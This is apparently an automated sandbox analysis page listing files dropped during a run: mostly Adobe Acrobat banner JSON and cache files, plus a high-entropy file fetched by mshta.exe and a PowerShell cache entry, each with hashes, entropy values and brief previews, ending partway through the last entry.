Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1122
Entropy (8bit):	5.683702323210272
Encrypted:	false
SSDEEP:	24:Yv6XkmeOrVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBH:YvSeCFgSNycJUAh8cvYHg
MD5:	662328ED9DD08D6A179D6171B743B3BE
SHA1:	077FE12D27001C509CD4AAFC6502A8B1554EED5D
SHA-256:	64949890FF357D8DF62E0773D1DB2754CB8CCDDBC1E6C22D33507187F1CAE84E
SHA-512:	172C6F70A89B2B4914C172CFF74931DFD1E37F685ACBC6457D944099C8BA7A97868B6C12E29B8004CC6F83F12467C7AACDB4B9AF4F5B40BA35A187571E98CD37
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.306285828771079
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJfQ1rPeUkwRe9:YvXKXfssdTeOWZGY16Ukee9
MD5:	93AB8EED0FF865F9ED42BF893B0B1B43
SHA1:	D94A134FF72A147F07BB93D9C6D66A3E85BF1C5C
SHA-256:	0A413B15B37FEAD2EBC0FB67CFAEDBC78F0154717ABE87E3D29C8679BFE46701
SHA-512:	0A9A229595375FCDAC5E2218DD4E95A36418DA876800E7FDF8A60C57AF4D8F609BEEC138959D00E05CC4FDBE696A75AD8C9EDC5A8BFF08777DE9C924C0E2701E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1102
Entropy (8bit):	5.676301046689693
Encrypted:	false
SSDEEP:	24:Yv6XkmeO62LgErcXWl7y0nAvzIBcSJCBViVH:YvSevogH47yfkB5kVG
MD5:	940A2A48264A1506BAA4E803BEC71241
SHA1:	22801213E9D9E61C25E18B2208C7733248AB5869
SHA-256:	335563CFA0F02DD3FA301714257A7D0227291395EB981CB47AA1A94639DB625C
SHA-512:	B49895286CABA863B991CB22422FA8AFAFB2AA17714D19BEA9C433BBA70E94562770324A26A0C3BC75537DE7D8F5AE85F03577A333B351A60209163431E865C8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1164
Entropy (8bit):	5.702084934833319
Encrypted:	false
SSDEEP:	24:Yv6XkmeOGKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5H:YvSeDEgqprtrS5OZjSlwTmAfSKJ
MD5:	FF8D03E951BB4FC5B018FD6C77029A1E
SHA1:	1714904B48B4C5B57AA2F8C890AADC6B28861BDA
SHA-256:	48D54E6D5515E0F9FA7BFD1E09E9F46ECCEAAA5B40E6AEDB3670AEF8A016957F
SHA-512:	AF64DDD0DF58B590906B26C0FC8E28B0314B2967DCB1603A56A3D4B29CEF796B078F359ACA0B6548BD9E5E9A6F76C33C62067164067F27149A382ACAE9183123
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.308915671527888
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJfYdPeUkwRe9:YvXKXfssdTeOWZGg8Ukee9
MD5:	1BEC967025C0ABA1773008769743589A
SHA1:	04A25DBDD36E9B153279C6E9938AB28ECB4C2A11
SHA-256:	DAD6CF8A4865DC68FA2714E7336249FD63CDEB5AB501B137D1575637C911F7B7
SHA-512:	79156B99C477131254C94CD1EF81A4CA213CADC4A35C3CB9650275434387EF671AAF98F9B459986C0136BBF6CE8FC0A8FD9B4D67008DC6C3119723C9E9465AB2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.29542200132643
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJf+dPeUkwRe9:YvXKXfssdTeOWZG28Ukee9
MD5:	7C6CFB93EB9190A4005EF91DCAF01B5F
SHA1:	CA0407E16A1086C0D1FE09FCF26EA453C17D9F61
SHA-256:	1F37C0261F28F9AE330FA57D5F3AF7C4EDB9374C4FD5C2E2E13C5AF766BC985B
SHA-512:	99197D29FD8E459F506F54B05877A2AF2D9B887317226CB164F5A553BAEF6EE4DF4CD4AEC90ACA59FDB83C1F2F868AC7A278CE789C80A10684DAD7248432013F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.292401493108776
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJfbPtdPeUkwRe9:YvXKXfssdTeOWZGDV8Ukee9
MD5:	AB3B30FA779FC21167B473EA6F9F0FCB
SHA1:	9C841C6A70B92D4D826CB24EBA4F46305742A397
SHA-256:	2DC573D071C955BA5E7283964394313887828FF871E5F4D81884F263E7F2A14F
SHA-512:	8467DB488591E5CEE22B362218F40E7100FF83A630101A43D15BD0DCBAD6AB5B0F430AF4C9AD1A78920D6F700BD427D2CE6BC17A0B6CFFFE8F64EEAC67DB2CE6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.296526601862791
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJf21rPeUkwRe9:YvXKXfssdTeOWZG+16Ukee9
MD5:	B0020C25F3D18F31DD6EE176C3413E0F
SHA1:	0FA1C2A3FEF3FC4F082F075ECC6ABF971257D9CD
SHA-256:	4FFB3531783865A2D1B14FB3344B812C9B195E3C41659DAD13BDA9B8A17DD51E
SHA-512:	22BE43D4DF1A5E4E05C6BC09717CDB085071F96E58761F25ABDF723AD6407CD0B8D7CD4915A3525630D99FE784B06449F16D80A9CF1D99DA2C35E6F9E471214F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.662502501348925
Encrypted:	false
SSDEEP:	24:Yv6XkmeOfamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSG:YvSeSBgkDMUJUAh8cvMG
MD5:	041A8AFE62EC478F50152592EC95CCB4
SHA1:	DF7E0FC721E8047A22C79B729DC62512A029DD05
SHA-256:	9ABB6975FC18F006468D5EF0B7921EA0937035AFAD5CF7F9429B5B8AB451B911
SHA-512:	9E100F89A93D5FF2703160D9C7D6B324A1178BBCEE31B3C894060B09631F19D5DCBEEB4DBE9BF8AAD1E60F0FD92DB3E9CED369234F7BDAEC978845B3432BC72B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.272849088848517
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJfshHHrPeUkwRe9:YvXKXfssdTeOWZGUUUkee9
MD5:	B0B4E8B2BBDB091FF1E7E22D51ABBAAE
SHA1:	83DB349ABA3BC088AB3BECC61F491545E18AED15
SHA-256:	5CFAD4661E598AF43095CA67AF6D90BCB72FB9CFFEE5442663B2D19589FB7710
SHA-512:	9F1C24D508D5D1A12DC67C101ED530BFA99075D5B9C01EDE4D274DF798B1DE1312FF6E203C09E5A6E9B68497D8177E7FCBA65D1358ACFDDE4F8EB41183C729D1
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	782
Entropy (8bit):	5.376884047159592
Encrypted:	false
SSDEEP:	12:YvXKXfssdTeOWZGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWb:Yv6XkmeOE168CgEXX5kcIfANhG
MD5:	F6877CB7F4A3D979CA466A6986681E42
SHA1:	8BB008F37D2085F21595E9752A7D3F58DB6B5456
SHA-256:	7C963411800B2E4427AC811BA6EAEA52EFD47A6ED367F17B358F911E229C7855
SHA-512:	D4C0CD2B6CF045F3F100AD54150BB9EA80A766EECE16C41CFE1C08243B4F66872534C8715316327144C97E3CA7A0AF5EA82DBD4F2E0612A9DF6E776C14023CAF
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1732281467245}}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	5.139261250469634
Encrypted:	false
SSDEEP:	24:Y2w3V1vcaqTayzsBJ/xRlC2ooneECPmjjg4m8sj0ShEXhl2Ea2LSjNXxRC5Zeh92:Y93VV2in/DoonN7gf8+un7axNXxEyh92
MD5:	225BA620A520EB296C5C3736D25CDE56
SHA1:	1F9E56BB0BC58AA1D8C4CEFED6A7E2D447C6F751
SHA-256:	95251487CE313CC9BAF74059FB99C72DFFA0802E1D3F7CD884FB862587432FAC
SHA-512:	24D6DEF1ECCF370ABB5CAC0AFDDB2CEB9024DB15424F8DAE6DDC38D97B1319557A47F2BD4E9B75DA009FF4DAFB6D04AE52EA21823FDBE140BC500DBB09E34E0E
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d1951fb58de0487c05da58d6f27a9025","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1732287035000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"39a6f64d50679067d1ac630684ce9a84","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1732287035000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"49ed528d3cc6d84788a99933be6245a5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1732287035000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"79d4458e07b435c51d10bbb5cab8d6e0","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1732287035000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"f5f01efd782177421bc56c6d16d047f1","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1732287035000},{"id":"Edit_InApp_Aug2020","info":{"dg":"4e72e5db81f53095ad117f746470ccbb","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.4531658299403496
Encrypted:	false
SSDEEP:	48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2ds5lb:lNVmsw3SHtbDbPe0K3+fDZdA
MD5:	92FE511F426F11BB3D83B8B18B2E5FD7
SHA1:	B8089F03641F8679F64D37AB01194A1C6DCCF45B
SHA-256:	565D3CE41918FAE0DF3BAC876DB5BB6C72BA39EFB5E9856E9319B6DBCBB7E6BC
SHA-512:	75B347A9D22A00BED3F51C04D30340BAB2EFC03840A2E46A6FCA75FC3A323493EE75B61E97F032729A9EF2E698A26EBE69BE0DD1CA4E4EC306723B57D27B6B98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.9592994006220985
Encrypted:	false
SSDEEP:	48:7MMsrvrBd6dHtbGIbPe0K3+fDy2dsM/qFl2GL7msY:7C3SHtbDbPe0K3+fDZdFKVmsY
MD5:	3D56F11141A8301D96CACE6B006B8938
SHA1:	C48352A6582D32430CAA6703FA0FFC2EEF98101B
SHA-256:	E354FA4114E64469ED699E1F122BDCCE20522696323523E0E75E404838682562
SHA-512:	D7E6383CD4A225BEC98DAE05FD9DD05DD19A860A2F2E59D032E4956E4BA7F75EC9AAA9BD436FD6855EB683C66CA09534A4018EE00D9C581BBC1123A77BEEDD3D
Malicious:	false
Preview:	.... .c.......#.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgPo57hQbA7399VJ+qeBjH+AB2PWYyu:6a6TZ44ADEPo51QbAz9weABaWK
MD5:	2D948F7DB1113E6532972009F9F05075
SHA1:	75124AF61685BD77AF09090D509059C1905A4C86
SHA-256:	47657F19025CBED1CCE6FDB43460AA289C934987410EA1062722923D678755C2
SHA-512:	E85D5F388A6DCE9E1FE6964189A327EAC7BB987543E447D7AD2C14102A3C019AC284A98CE46A8B615452BC8535BE1FEB141011750508C2154D3182EEE900B50C
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\x64dbg2[1]

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	79294
Entropy (8bit):	6.053830052419051
Encrypted:	false
SSDEEP:	768:JiiGwjZhhLsDvzRTaSy2fdRjLBdQ/FtUrmIOCv/s/c:JjGYQDvzRVy2nHBd0YgN/c
MD5:	CBF49A348E15C995EA26F800AEEA4E7F
SHA1:	0FCAD636B340050FD534B7999DAE66EA366FB3C7
SHA-256:	38A432D4C9DC9A2BEFA4AFBE7CEB4CE06C8A474886402596C785B6BA6AE86E73
SHA-512:	FED110BD1DFB251FA5665E0DD4EEA5166C346CB5175DDD25598232CFD8ACDF8F8AA178923400ECAD17D5FF44CAB32774E2E7AB9550C571B2DE09D9A00659C15D
Malicious:	false
Preview:	I..Z.c...a\|.P.U..T.0..r.Q.A..._.6..8mau..M..p..M..`..u.E..Ky.B......p.{.~~...(Q.."Io.....D....$.s.....n4D.E......\!p.X#.[...&..^.l.../.w.'..Y..V#.J.:j....I...rH....- .Y1m....-j...$J...L.n...m(.-..k...A.[eO...L.Wg.....F.1a\|..4./......:....[.B....e.....0...e.....M....^'..7...'...L.>Y....@..b.]^....5.....!.5>...W..x>........V.L....o..j..p..Ug.EO....b9..Ud.....g.3....j..A.... .K. ...fW1..op!.....3.@..1]. (...CyD.k@...o....B.S,.PG..W7.$.E/%..+..Qx..fim..5.O..F.8V.9E4..w.?.p..J......?..iI.Ax2....'..D....)./.e.O.IP.t....w.5...tJ."[.n......7...W...}y.@....lk....hh.{.....Ca$C....Sw.Q_.....Ey....$....Jv`...o..9yt".^....T..:...D....[.q...N.If.B...f_w'.....{;...P..C.X..]R.k..~.........u.....d...!.O......C......:k..{.y....Ld..k\.XWj.....`....1~.....:.5.....\|.,..:0i_O..l...kg.....-..!..\y........N'7=.U..B#.S...zou.\|c.._.ZI....!.p.........^C._..i.\k..??.K...T0.m.:^....o./....s..X....@l.S.;3.-..............a...n.......I.4n.[tNE.Pf_..C./.6&.3?.......u.e.lZF.C

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19532
Entropy (8bit):	5.011203297145078
Encrypted:	false
SSDEEP:	384:Wrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeY+YW+OdBANXp5yvOjJlYoaYpib47:WLmV3IpNBQkj2Uh4iUxDhiY+YW+OdBA7
MD5:	F8FA7F910F59CF21C500BE69336E4BB1
SHA1:	A5CFD0F7C0343D4A2C33DBDF6E997F8CB41A7B6C
